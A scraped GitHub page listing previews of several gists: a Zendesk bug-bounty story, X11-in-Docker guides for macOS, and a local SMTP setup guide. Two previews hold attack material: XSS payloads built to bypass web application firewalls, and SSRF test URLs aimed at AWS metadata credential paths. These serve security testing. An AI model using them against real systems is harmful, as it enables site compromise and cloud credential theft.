Skip to content

Instantly share code, notes, and snippets.

View superboy-zjc's full-sized avatar

2h0ng superboy-zjc

  • Baltimore
  • 19:45 (UTC -05:00)
View GitHub Profile
@hackermondev
hackermondev / zendesk.md
Last active November 25, 2024 13:07
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@sorny
sorny / x11_forwarding_macos_docker.md
Last active November 6, 2024 12:03
X11 forwarding with macOS and Docker

X11 forwarding on macOS and docker

A quick guide on how to setup X11 forwarding on macOS when using docker containers requiring a DISPLAY. Works on both Intel and M1 macs!

This guide was tested on:

  • macOS Catalina 10.15.4
  • docker desktop 2.2.0.5 (43884) - stable release
  • XQuartz 2.7.11 (xorg-server 1.18.4)
  • Macbook Pro (Intel)
@zetc0de
zetc0de / xss-bypass-waf
Last active January 9, 2024 09:20
XSS Bypass WAF
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
@jhaddix
jhaddix / cloud_metadata.txt
Last active November 16, 2024 11:54 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@cschiewek
cschiewek / x11_docker_mac.md
Last active November 21, 2024 20:26
X11 in docker on macOS

To forward X11 from inside a docker container to a host running macOS

  1. Install XQuartz: https://www.xquartz.org/
  2. Launch XQuartz. Under the XQuartz menu, select Preferences
  3. Go to the security tab and ensure "Allow connections from network clients" is checked.
  4. Run xhost + ${hostname} to allow connections to the macOS host *
  5. Setup a HOSTNAME env var export HOSTNAME=`hostname`*
  6. Add the following to your docker-compose:
 environment:
@raelgc
raelgc / Email Server (Linux, Unix, Mac).md
Last active September 30, 2024 23:45
Setup a Local Only SMTP Email Server (Linux, Unix, Mac)

Setup a Local Only SMTP Email Server (Linux, Unix, Mac)

1 - Point localhost.com to your machine

Most of programs will not accept an email using just @localhost as domain. So, edit /etc/hosts file to make the domain localhost.com point to your machine, including this content to the file:

127.0.0.1 localhost.com

2 - Install Postfix